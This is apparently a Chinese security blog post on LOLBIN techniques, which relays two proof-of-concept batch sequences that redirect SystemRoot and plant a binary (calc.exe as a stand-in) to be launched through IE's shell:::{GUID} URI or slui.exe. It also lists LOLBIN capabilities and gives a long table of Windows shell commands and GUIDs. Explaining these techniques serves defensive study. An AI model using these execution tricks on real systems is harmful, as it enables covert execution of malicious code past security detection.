相关阅读

视频讲解

本期视频我们将分享一些神奇的LOLBIN技巧,首先,给大家介绍下LOLBIN(Living off the land Binaries)的概念,它是攻击者隐藏踪迹的一种常见手段,它会利用操作系统本身的文件或者一些系统的自身签名文件从而绕过检测,这里我们将使用Windows系统自带的start iexplore启动IE浏览器的命令,强制用户打开一些恶意软件,我们用计算器作为概念验证,大家一起来看下!

LOLBIN玩法讲解

来自@notwhickeyTwitter分享

图片[1]-如何通过IE浏览器强制运行恶意软件-FancyPig's blog

你有没有考虑过IE浏览器是一个LOLBIN
通过导航到URI:shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}你可以催生rstrui.exe(系统还原)。
如果你修改了SystemRoot环境变量并复制了DLLs,你可以运行任何你喜欢的东西。

图片[2]-如何通过IE浏览器强制运行恶意软件-FancyPig's blog

验证POC

mkdir %temp%\System32
FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL
set a=C:\Windows\System32\calc.exe
copy %a% %temp%\System32\rstrui.exe /Y > NUL
set SystemRoot=%temp%
start iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}
图片[3]-如何通过IE浏览器强制运行恶意软件-FancyPig's blog

我发现了一个签名的#lolbin用于代理执行。
使用setSystemRoot环境修改为一个受控目录。
在路径<controlled directory>\System32\ChangePk.exe中植入一个二进制文件。
复制必要的DLLs。
运行slui.exe

我想知道它在你的cpu上是否有效。

图片[4]-如何通过IE浏览器强制运行恶意软件-FancyPig's blog

验证POC

set a=C:\Windows\System32\calc.exe
set SystemRoot=%temp%
mkdir %temp%\System32
copy C:\Windows\System32\slui.exe %temp%\System32\ /Y >NUL
copy %a% %temp%\System32\ChangePk.exe /Y > NUL
FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL
slui.exe

LOLBIN介绍

以下内容摘自《浅谈Living Off the Land Binaries》

什么是LoLbins

Living off the land Binaries简称LoLbins。Living off the land 是由ChristopherCampbell和MattGraeber提出的。Lolbins为二进制文件。攻击方可以通过该二进制文件执行超出其本身功能的工作。

LoLbin功能

  • 执行代码
    • 任意代码执行。
    • 通过LOLbins执行其他程序(未带微软签名)或者脚本。
  • 代码编译
  • 文件操作
    • 正在下载;
    • 上传;
    • 复制。
  • 持久性权限维持
    • 利用现有的LOLBins来做权限维持。
    • 持久性(比如通过隐藏数据在AD中,在登录时候启动。)
  • UAC Bypass
  • 转储进程内存
  • 监控(例如键盘记录器,网络跟踪等等)。
  • 逃避/修改日志
  • 不需要重定位到文件系统其他位置的DLLinjected/side-loading。

LOLBIN是否有黑客组织在应用?

shell命令 – 完整列表

以下是整理了Windows11的常见shell命令以及打开的应用程序

Shell命令打开应用
shell:3D Objects3D Objects
shell:AccountPicturesAccount Pictures
shell:AddNewProgramsFolderAddNewProgramsFolder
shell:Administrative ToolsWindows Tools
shell:AppDataAppData
shell:AppDataDesktopAppDataDesktop
shell:AppDataDocumentsAppDataDocuments
shell:AppDataFavoritesAppDataFavorites
shell:AppDataProgramDataAppDataProgramData
shell:Application ShortcutsApplication Shortcuts
shell:AppModsApplication Mods
shell:AppsFolderAppsFolder
shell:AppUpdatesFolderAppUpdatesFolder
shell:CacheCache
shell:Camera RollCamera Roll
shell:CameraRollLibraryCamera Roll
shell:CapturesCaptures
shell:CD BurningTemporary Burn Folder
shell:ChangeRemoveProgramsFolderChangeRemoveProgramsFolder
shell:Common Administrative ToolsWindows Tools
shell:Common AppDataCommon AppData
shell:Common DesktopPublic Desktop
shell:Common DocumentsPublic Documents
shell:Common ProgramsPrograms
shell:Common Start MenuStart Menu
shell:Common Start Menu PlacesStart Menu
shell:Common StartupStartup
shell:Common TemplatesCommon Templates
shell:CommonDownloadsPublic Downloads
shell:CommonMusicPublic Music
shell:CommonPicturesPublic Pictures
shell:CommonRingtonesCommonRingtones
shell:CommonVideoPublic Videos
shell:ConflictFolderConflictFolder
shell:ConnectionsFolderConnectionsFolder
shell:ContactsContacts
shell:ControlPanelFolderControlPanelFolder
shell:CookiesCookies
shell:CredentialManagerCredentialManager
shell:CryptoKeysCryptoKeys
shell:CSCFolderCSCFolder
shell:DesktopDesktop
shell:Development FilesDevelopment Files
shell:Device Metadata StoreDevice Metadata Store
shell:DocumentsLibraryDocuments
shell:DownloadsDownloads
shell:DpapiKeysDpapiKeys
shell:FavoritesFavorites
shell:FontsFonts
shell:GameTasksGameTasks
shell:HistoryHistory
shell:ImplicitAppShortcutsImplicitAppShortcuts
shell:InternetFolderInternetFolder
shell:LibrariesLibraries
shell:LinksLinks
shell:Local AppDataLocal AppData
shell:Local DocumentsDocuments
shell:Local DownloadsDownloads
shell:Local MusicMusic
shell:Local PicturesPictures
shell:Local VideosVideos
shell:LocalAppDataLowLocalAppDataLow
shell:LocalizedResourcesDirLocalizedResourcesDir
shell:MAPIFolderMAPIFolder
shell:MusicLibraryMusic
shell:My MusicMusic
shell:My PicturesPictures
shell:My VideoVideos
shell:MyComputerFolderMyComputerFolder
shell:NetHoodNetHood
shell:NetworkPlacesFolderNetworkPlacesFolder
shell:OEM LinksOEM Links
shell:OneDriveOneDrive
shell:OneDriveCameraRollOneDriveCameraRoll
shell:OneDriveDocumentsOneDriveDocuments
shell:OneDriveMusicOneDriveMusic
shell:OneDrivePicturesOneDrivePictures
shell:Original ImagesOriginal Images
shell:PersonalDocuments
shell:PhotoAlbumsSlide Shows
shell:PicturesLibraryPictures
shell:PlaylistsPlaylists
shell:PrintersFolderPrintersFolder
shell:PrintHoodPrintHood
shell:ProfileProfile
shell:ProgramFilesProgram Files
shell:ProgramFilesCommonProgramFilesCommon
shell:ProgramFilesCommonX64ProgramFilesCommonX64
shell:ProgramFilesCommonX86ProgramFilesCommonX86
shell:ProgramFilesX64ProgramFilesX64
shell:ProgramFilesX86Program Files (x86)
shell:ProgramsPrograms
shell:PublicPublic
shell:PublicAccountPicturesPublic Account Pictures
shell:PublicGameTasksPublicGameTasks
shell:PublicLibrariesPublicLibraries
shell:Quick LaunchQuick Launch
shell:RecentRecent Items
shell:Recorded CallsRecorded Calls
shell:RecordedTVLibraryRecorded TV
shell:RecycleBinFolderRecycleBinFolder
shell:ResourceDirResourceDir
shell:Retail DemoRetail Demo
shell:RingtonesRingtones
shell:Roamed Tile ImagesRoamed Tile Images
shell:Roaming TilesRoaming Tiles
shell:SavedGamesSaved Games
shell:SavedPicturesSaved Pictures
shell:SavedPicturesLibrarySaved Pictures
shell:ScreenshotsScreenshots
shell:SearchesSearches
shell:SearchHistoryFolderSearchHistoryFolder
shell:SearchHomeFolderSearchHomeFolder
shell:SearchTemplatesFolderSearchTemplatesFolder
shell:SendToSendTo
shell:Start MenuStart Menu
shell:StartupStartup
shell:SyncCenterFolderSyncCenterFolder
shell:SyncResultsFolderSyncResultsFolder
shell:SyncSetupFolderSyncSetupFolder
shell:SystemSystem
shell:SystemCertificatesSystemCertificates
shell:SystemX86SystemX86
shell:TemplatesTemplates
shell:ThisDeviceFolderThisDeviceFolder
shell:ThisPCDesktopFolderDesktop
shell:User PinnedUser Pinned
shell:UserProfilesUsers
shell:UserProgramFilesUserProgramFiles
shell:UserProgramFilesCommonUserProgramFilesCommon
shell:UsersFilesFolderUsersFilesFolder
shell:UsersLibrariesFolderUsersLibrariesFolder
shell:VideosLibraryVideos
shell:WindowsWindows

上面的不是重点,重点在这里,还有一些很奇怪的使用GUID打开的方式

包含GUID的shell命令打开的应用
shell:::{088e3905-0323-4b02-9826-5d99428e115f}Downloads
shell:::{0DB7E03F-FC29-4DC6-9020-FF41B59E513A}3D Objects
shell:::{1CF1260C-4DD0-4ebb-811F-33C572699FDE}Music
shell:::{24ad3ad4-a569-4530-98e1-ab02f9417aa8}Pictures
shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}Windows Search
shell:::{3134ef9c-6b18-4996-ad04-ed5912e00eb5}Recent Files
shell:::{374DE290-123F-4565-9164-39C4925E467B}Downloads
shell:::{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}Connect To
shell:::{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}Pictures
shell:::{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}Music
shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}My Documents
shell:::{679f85cb-0220-4080-b29b-5540cc05aab6}Quick Access
shell:::{A0953C92-50DC-43bf-BE83-3742FED03C9C}Videos
shell:::{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}Documents
shell:::{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}Desktop
shell:::{d3162b92-9365-467a-956b-92703aca08af}Documents
shell:::{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}Videos
shell:::{D4480A50-BA28-11d1-8E75-00C04FA31A86}Add Network Place
shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}All Control Panel Items
shell:::{ED7BA470-8E54-465E-825C-99712043E01C}All Tasks
shell:::{4234d49b-0245-4df3-b780-3893943456e1}Applications
shell:::{c57a6066-66a3-4d91-9eb9-41532179f0a5}AppSuggestedLocations
shell:::{9C60DE1E-E5FC-40f4-A487-460851A8D915}AutoPlay
shell:::{28803F59-3A75-4058-995F-4EE5503B023C}Bluetooth Devices
shell:::{9343812e-1c37-4a49-a12e-4b2d810d956b}Classic Windows Search
shell:::{437ff9c0-a07f-4fa0-af80-84b6c6440a16}Command Folder
shell:::{d34a6ca6-62c2-4c34-8a7c-14709c1ad938}Common Places FS Folder
shell:::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}Network Computers and Devices
shell:::{26EE0668-A00A-44D7-9371-BEB064C98683}Control Panel
shell:::{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}Control Panel command object for Start menu and desktop
shell:::{1206F5F1-0569-412C-8FEC-3204630DFB70}Credential Manager
shell:::{b155bdf8-02f0-451e-9a26-ae317cfd7779}delegate folder that appears in Computer
shell:::{A8A91A66-3A7D-4424-8D24-04E180695C7A}Devices and Printers
shell:::{289AF617-1CC3-42A6-926C-E6A863F0E3BA}Media Servers
shell:::{D555645E-D4F8-4c29-A827-D93C859C4F2A}Ease of Access Center
shell:::{ECDB0924-4208-451E-8EE0-373C0956DE16}Work Folders
shell:::{323CA680-C24D-4099-B94D-446DD2D7249E}Favorites
shell:::{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}File Explorer Options
shell:::{93412589-74D4-4E4E-AD0E-E0CB621440FD}Font settings
shell:::{3936E9E4-D92C-4EEE-A85A-BC16D5EA0819}Frequent folders
shell:::{1D2680C9-0E2A-469d-B787-065558BC7D43}Fusion Cache
shell:::{F6B6E965-E9B2-444B-9286-10C9152EDBC5}File History
shell:::{67CA7650-96E6-4FDD-BB43-A8E774F73A57}HomeGroup
shell:::{0907616E-F5E6-48D8-9D61-A91C3D28106D}Remote File Browser
shell:::{15eae92e-f17a-4431-9f28-805e482dafd4}Get Programs
shell:::{d450a8a1-9568-45c7-9c0e-b4f9fb4537bd}Installed Updates
shell:::{B2B4A4D1-2754-4140-A2EB-9A76D9D7CDC6}Linux
shell:::{1FA9085F-25A2-489B-85D4-86326EEDCD87}Manage Wireless Networks
shell:::{63da6ec0-2e98-11cf-8d82-444553540000}Microsoft FTP Folder
shell:::{89D83576-6BD1-4c86-9454-BEB04E94C819}Microsoft Office Outlook
shell:::{5ea4f148-308c-46d7-98a9-49041b1dd468}Windows Mobility Center
shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D}Network
shell:::{8E908FC9-BECC-40f6-915B-F4CA0E70D03D}Network and Sharing Center
shell:::{7007ACC7-3202-11D1-AAD2-00805FC1270E}Network Connections
shell:::{992CFFA0-F557-101A-88EC-00DD010CCC48}Network Connections
shell:::{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}Offline Files
shell:::{AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E}Offline Files Folder
shell:::{018D5C66-4533-4307-9B53-224DE2ED1FE6}OneDrive
shell:::{6785BFAC-9D2D-4be5-B7E2-59937E8FB80A}Homegroup
shell:::{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}Personalization
shell:::{35786D3C-B075-49b9-88DD-029876E11C01}Portable Devices
shell:::{025A5937-A6BE-4686-A844-36FE4BEC8B6D}Power Options
shell:::{9DB7A13C-F208-4981-8353-73CC61AE2783}Previous Versions
shell:::{a3c3d402-e56c-4033-95f7-4885e80b0111}Previous Versions Results Delegate Folder
shell:::{f8c2ab3b-17bc-41da-9758-339d7dbf2d88}Previous Versions Results Folder
shell:::{2227A280-3AEA-1069-A2DE-08002B30309D}Printers
shell:::{ed50fc29-b964-48a9-afb3-15ebb9b97f36}printhood delegate folder
shell:::{7b81be6a-ce2b-4676-a29e-eb907a5126c5}Programs and Features
shell:::{4336a54d-038b-4685-ab02-99bb52d3fb8b}Public Folder
shell:::{4564b25e-30cd-4787-82ba-39e73a750b14}Recent Items Instance Folder
shell:::{22877a6d-37a1-461a-91b0-dbda5aaebc99}Recent Places Folder
shell:::{645FF040-5081-101B-9F08-00AA002F954E}Recycle Bin
shell:::{863aa9fd-42df-457b-8e4d-0de1b8015c60}Remote Printers
shell:::{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}Removable Drives
shell:::{a6482830-08eb-41e2-84c1-73920c2badb9}Removable Storage Devices
shell:::{2965e715-eb66-4719-b53f-1672673bbefa}Results Folder
shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}Run…
shell:::{D9EF8727-CAC2-4e60-809E-86F80A666C91}BitLocker Drive Encryption
shell:::{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}Security and Maintenance
shell:::{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0}Set Program Access and Computer Defaults
shell:::{17cd9488-1228-4b2f-88ce-4298e93e0966}Default Programs
shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}Show desktop
shell:::{58E3C745-D971-4081-9034-86E34B30836A}Speech Recognition
shell:::{48e7caab-b918-4e58-a94d-505519c795dc}Start Menu
shell:::{F942C606-0914-47AB-BE56-1321B8035096}Storage Spaces
shell:::{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}Sync Center
shell:::{2E9E59C0-B437-4981-A647-9C34B9B90891}Sync Setup Folder
shell:::{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}About System
shell:::{9FE63AFD-59CF-4419-9775-ABCC3849F861}System Recovery
shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}System Restore
shell:::{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}Taskbar
shell:::{0DF44EAA-FF21-4412-828E-260A8728E7F1}Taskbar
shell:::{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}This Device
shell:::{f8278c54-a712-415b-b593-b77a2be0dda9}This Device
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}This PC
shell:::{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651}Troubleshooting
shell:::{60632754-c523-4b62-b45c-4172da012619}User Accounts
shell:::{7A9D77BD-5403-11d2-8785-2E0420524153}User Accounts
shell:::{1f3427c8-5c10-4210-aa03-2ee45287d668}User Pinned
shell:::{59031a47-3f72-44a7-89c5-5595fe6b30ee}UsersFiles
shell:::{031E4825-7B94-4dc3-B131-E946B44C8DD5}Libraries
shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}Switch between windows
shell:::{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}Backup and Restore (Windows 7)
shell:::{4026492F-2F69-46B8-B9BF-5654FC07E423}Windows Defender Firewall
shell:::{67718415-c450-4f3c-bf8a-b487642dc39b}Windows Features
shell:::{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}Windows Security
shell:::{D20EA4E1-3957-11d2-A40B-0C5020524153}Windows Tools
shell:::{241D7C96-F8BF-4F85-B01F-E2B043341A4B}RemoteApp and Desktop Connections
shell:::{F874310E-B6B7-47DC-BC84-B9E6B38F5903}The Home folder in File Explorer

其他资料

© 版权声明
THE END
喜欢就支持一下吧
点赞9赞赏 分享
评论 共4条

请登录后发表评论